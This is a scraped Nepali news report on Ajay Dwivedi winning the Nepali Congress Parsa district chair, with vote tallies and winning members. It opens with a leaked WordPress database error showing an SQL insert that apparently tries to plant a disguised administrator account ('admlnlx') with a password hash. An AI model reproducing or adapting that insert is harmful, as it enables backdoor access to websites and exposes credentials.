WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BNnrYFBsWu3dnHMvtVosvd928UO.7J.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 23:09:22', '', 'admlnlx', 'admlnlx')
वीरगन्ज,माघ २९-
नेपाली कांग्रेस पर्साको सभापतिमा अजय द्विवेदी विजयी भएका छन्। दोस्रो चरणको निर्वाचनको नतिजा अनुसार द्विवेदी पक्षमा उम्मेदवार नै बहुमतले विजयी भएका छन्।
द्विवेदीले ५५० मत ल्याए भने उनमा प्रतिस्पर्धी जनार्दनसिंह क्षेत्रीले ३५५ मत ल्याउका छन्। सचिवमा द्विवेदी पक्षकै किशोरीप्रसाद कानु विजयी भए। त्यसैगरी वशिष्ठनारायाण कुर्मी पक्षबाट कोषाध्यक्षमा ३१३ मत ल्याएर इम्तियाज आलम विजयी भएको निर्वाचन अधिकृत देवेन्द्र कोइरालाले जानकारी दिए।
यसैगरी, क्षेत्र नं १, २ र ३ मा विजयी भएका १५ जना सदस्यहरु द्विवेदी पक्षकै रहेका छन्। निर्वाचन क्षेत्र नं १ का महिला सदस्यमा भवानी घिमिरे, पुरुष सदस्यहरुमा महम्द सहाबुद्दीन, दीना गुप्ता, प्रेमशंकर सिंह, रोशन लामिछाने, निर्वाचन क्षेत्र नं २ बाट ब्रह्मदेव प्रसाद कुर्मी, रामबाबु प्रसाद कुर्मी, जाकिर हुसैन, वीरेन्द्र यादव, निर्मला देवी सिंह, क्षेत्र नं ३ बाट राजेश्वर यादव, राजेन्द्र यादव, शुकमान तमाड्ड, नितेन्द्र साह, मिना पाण्डे, क्षेत्र नं ४ बाट कृष्ण चौहान, ढेडी यादव, भगवती चौधरी, शैलेन्द्र कुमार यादव, लक्ष्मीना देवी रौनीयार र क्षेत्र नं ५ बाट रामबहादुर श्रेष्ठ, वीरेन्द्र यादव, प्रेमबहादुर थापा, श्यामकिशोर कुर्मी र रामपति पासवान विजयी भएका छन्।